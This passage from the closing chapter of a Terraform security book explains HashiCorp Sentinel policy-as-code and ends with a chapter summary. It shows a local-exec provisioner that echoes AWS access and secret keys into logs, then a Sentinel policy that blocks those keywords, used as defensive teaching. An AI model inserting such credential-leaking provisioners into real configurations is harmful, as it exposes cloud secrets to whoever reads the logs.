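    --name "prod/database" \
    --secret-string '{"username":"admin","password":"hunter2"}'
```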
Tip If you are not already using Vault to manage secrets, AWS Secrets Manager is a great alternative.
Sentinel is an embeddable policy-as-code framework designed for automating governance, security, and compliance decisions. Complex legal and business requirements, which have traditionally been enforced manually by humans, can be expressed entirely as code with Sentinel policies, and Sentinel can automatically prevent out-of-compliance Terraform runs from executing. For example, you normally do not want someone deploying 5,000 virtual machines without explicit authorization, yet Terraform itself has no guardrails to prevent it. With Sentinel, you can write a policy that automatically rejects such requests before Terraform applies the changes (see figure 13.9).
Figure 13.9 Sentinel policies are checked between the plan and apply of a Terraform CI/CD pipeline. If any Sentinel policy fails, the run exits with an error condition, and the Apply stage is skipped.
Sentinel is a stand-alone HashiCorp product designed to work with all of HashiCorp’s Enterprise service offerings, including Consul, Nomad, Terraform, and Vault. It has matured over the years and finally found its place under HashiCorp’s “Better Together” narrative. But before I get you too excited about Sentinel and the great things it can do, you should know that it isn’t open source and doesn’t work with open source Terraform.
Sentinel policies are not written in HCL, as you might expect. Instead, they are written in Sentinel, a domain-specific programming language with a passing resemblance to Python. Sentinel policies are made up of rules, which are essentially functions that return either true or false (pass or fail). As long as all the rules in a policy pass, the overall policy passes. If you are using Sentinel in a CI/CD pipeline, that means execution continues to the apply stage.
The following is a trivial Sentinel policy that passes for all use cases:
main = rule { ❶
true
}
❶ A policy with a single rule that always evaluates to true
The goal of this book isn’t to teach Sentinel, but I want to give you a feel for the practical problems you can solve with it. Consider the dilemma we had earlier with being able to print environment variables such as AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY using local-exec provisioners. Here’s the code that did this:
resource "null_resource" "uh_oh" {
  provisioner "local-exec" {
    command = <<-EOF
      echo "access_key=$AWS_ACCESS_KEY_ID"
      echo "secret_key=$AWS_SECRET_ACCESS_KEY"
    EOF
  }
}
Without Sentinel, you would have to manually skim through all the configuration code to make sure nobody is abusing local-exec provisioners this way. With Sentinel, you can write a policy to automatically block any Terraform run whose configuration code contains the keyword AWS_ACCESS_KEY_ID or AWS_SECRET_ACCESS_KEY in a provisioner. The following Sentinel policy does just that.
Listing 13.10 Sentinel policy for validating local-exec provisioners
import "tfconfig/v2" as tfconfig
keywordInProvisioners = func(s){
bad_provisioners = filter tfconfig.provisioners as _, p {
p.type is "local-exec" and
p.config.command["constant_value"] matches s
}
return length(bad_provisioners) > 0
}
no_access_keys = rule {
not keywordInProvisioners("AWS_ACCESS_KEY_ID")
}
no_secret_keys = rule {
not keywordInProvisioners("AWS_SECRET_ACCESS_KEY")
}
main = rule { ❶
no_access_keys and
no_secret_keys
}
❶ Rule that disallows access keys and secret keys from being printed by local-exec provisioners
Note Sentinel policies are not easy to write! You should expect a steep learning curve even if you are already a skilled programmer.
If we incorporate this Sentinel policy as part of our CI/CD pipeline, a subsequent run fails with the following error message:
$ sentinel apply p.sentinel
Fail

Execution trace. The information below will show the values of all
the rules evaluated and their intermediate boolean expressions.
Note that some boolean expressions may be missing if short-circuit
logic was taken.

FALSE - p.sentinel:19:1 - Rule "main" ❶
  FALSE - p.sentinel:20:2 - no_access_keys
    FALSE - p.sentinel:12:2 - not keywordInProvisioners("AWS_ACCESS_KEY_ID")
      TRUE - p.sentinel:5:3 - p.type is "local-exec"
      TRUE - p.sentinel:6:3 - p.config.command["constant_value"] matches s

FALSE - p.sentinel:11:1 - Rule "no_access_keys"
  TRUE - p.sentinel:5:3 - p.type is "local-exec"
  TRUE - p.sentinel:6:3 - p.config.command["constant_value"] matches s
❶ The main rule has failed because the “no_access_keys” composition rule has failed.
You can use Sentinel to enforce that any attribute on any resource is what you want it to be. Examples of other common policies include disallowing 0.0.0.0/0 Classless Inter-Domain Routing (CIDR) blocks, restricting instance types of Elastic Compute Cloud (EC2) instances, and enforcing tagging on resources.
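As an illustration of the CIDR case, a sketch of such a policy might look like the following, written against the tfplan/v2 import; the resource type and attribute paths are assumptions based on the AWS provider and may need adjusting for your Sentinel version:

```sentinel
import "tfplan/v2" as tfplan

# Collect all planned ingress security-group rules.
ingress_rules = filter tfplan.resource_changes as _, rc {
	rc.type is "aws_security_group_rule" and
	rc.change.after.type is "ingress"
}

# Fail if any ingress rule is open to the entire internet.
no_open_ingress = rule {
	all ingress_rules as _, rc {
		not ("0.0.0.0/0" in rc.change.after.cidr_blocks)
	}
}

main = rule {
	no_open_ingress
}
```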
TIP If you are not a programmer or don’t have time to write your own policies, you can also use policies written by other people (which are published as Sentinel modules).
We are at the end of the last chapter of the book. You now know the fundamentals of Terraform, which are important as an individual contributor, as well as how to manage, extend, automate, and secure Terraform. You know all the tricks and backdoors that hackers can use to steal your sensitive information—and, more important, you know how to fight back. At this point, you should feel extremely confident in your ability to tackle any problem with Terraform. You are a Terraform guru now, and people will look to you for guidance on the subject matter.
Even though this is the end of our journey together, I hope you will have many more great experiences working with Terraform in the future. Please email me or leave a review if you liked the book. Thanks for reading.
State files can be secured by removing unnecessary secrets, applying least-privileged access control, and using encryption at rest.
Log files can be secured by turning off trace logs and avoiding the use of local-exec provisioners, external data sources, and the HTTP data source.
Static secrets should be set as environment variables whenever possible. If you absolutely must use Terraform variables, consider maintaining a separate secrets.tfvars file explicitly for this purpose.
Dynamic secrets are far safer than static secrets because they are created on demand and valid for only the period of time they will be used. You can read dynamic secrets with the corresponding data source from Vault or the AWS provider.
Sentinel can enforce policy as code. Sentinel policies automatically reject Terraform runs based on the contents of the configuration code or the results of a plan.